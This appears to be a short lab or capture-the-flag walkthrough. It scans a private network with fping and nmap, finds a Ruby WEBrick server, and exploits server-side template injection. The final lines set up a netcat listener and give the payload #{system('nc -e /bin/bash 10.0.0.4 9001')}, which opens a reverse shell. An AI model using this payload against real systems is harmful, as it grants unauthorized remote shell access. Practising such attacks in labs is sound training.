❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.160
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.160
Starting Nmap 7.93 ( <https://nmap.org> ) at 2022-12-31 12:36 +0545
Nmap scan report for 10.0.0.160
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 ee71f4ada071e1351986abc8e6be3617 (RSA)
| 256 401cc3da83d72f60cb12473b02670414 (ECDSA)
|_ 256 1a69a7f9dca549ffd27dce45976d8ab9 (ED25519)
8000/tcp open http WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap shows a WebRick Ruby application on port 8000. It’s a simple HTTP server for ruby.s
The homepage has a text input that returns the submitted data.
This probably means command injection using templates. Let’s see.
SSTI (Server Side Template Injection)
Proof
It will give us a reverse shell.
Netcat listener:
❯ nc -nlvp 9001
Ncat: Version 7.93 ( <https://nmap.org/ncat> )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
The command injection code is as follows.
#{system('nc -e /bin/bash 10.0.0.4 9001')}
Shell